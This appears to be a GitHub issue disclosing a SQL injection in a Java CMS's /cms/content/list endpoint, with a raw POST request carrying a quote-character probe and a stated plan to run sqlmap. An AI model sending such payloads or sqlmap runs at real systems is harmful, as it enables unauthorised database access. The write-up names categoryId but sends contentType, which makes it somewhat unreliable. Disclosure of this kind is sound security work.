You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
A suspicious point was found in the IContentDao.xml file
Since the id of select maps to a method in Java, and this XML corresponds to Content, we looked directly in ComtentAction.java and found a call to
Next we try to inject, see the top class definition of ComtentAction.java of the file, we can know that the route is host:port/cms/content, and then Adding the method to be called, we can get the route as host:port/cms/content/list, and from the placeholder of IContentDao.xml, we can know that the suspicious injection point is categoryId, and then try to inject
POST /cms/content/list HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: Phpstorm-f0bc0443=05da4cd3-973a-421b-afa6-a7c2e0ed2f79;
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Content-Type: application/x-www-form-urlencoded
Content-Length: 14
contentType=1'
---
As you can see, the injection was successful, and the next step is to save the post package and put it into sqlmap to run
The text was updated successfully, but these errors were encountered:
A suspicious point was found in the
IContentDao.xml
fileSince the
id
ofselect
maps to a method in Java, and this XML corresponds to Content, we looked directly inComtentAction.java
and found a call toNext we try to inject, see the top class definition of
ComtentAction.java
of the file, we can know that the route ishost:port/cms/content
, and then Adding the method to be called, we can get the route ashost:port/cms/content/list
, and from the placeholder ofIContentDao.xml
, we can know that the suspicious injection point iscategoryId
, and then try to inject---
As you can see, the injection was successful, and the next step is to save the post package and put it into sqlmap to run
The text was updated successfully, but these errors were encountered: